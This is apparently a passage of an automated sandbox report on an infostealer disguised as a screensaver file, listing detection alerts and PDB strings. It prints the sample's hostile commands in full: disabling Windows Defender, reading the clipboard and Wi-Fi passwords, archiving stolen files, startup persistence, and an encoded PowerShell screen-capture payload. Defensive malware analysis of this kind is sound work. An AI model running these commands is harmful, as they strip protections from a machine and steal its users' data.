AgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 6844, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7908, TargetFilename: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, ProcessId: 7616, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 744, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 2860, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7592, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE SynthIndi Loader CnC Response - Source IP: 149.154.167.220 - Destination IP: 192.168.2.5

Timestamp:	2024-08-04T02:22:28.590934+0200
SID:	2857752
Source Port:	443
Destination Port:	57967
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-08-04T02:22:27.754644+0200
SID:	2857751
Source Port:	57967
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: #U202f#U202f#U2005#U00a0.scr.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: #U202f#U202f#U2005#U00a0.scr.exe	ReversingLabs: Detection: 71%
Source: #U202f#U202f#U2005#U00a0.scr.exe	Virustotal: Detection: 72%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: #U202f#U202f#U2005#U00a0.scr.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7E9901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

68_2_00007FF7F7E9901C

Source: #U202f#U202f#U2005#U00a0.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
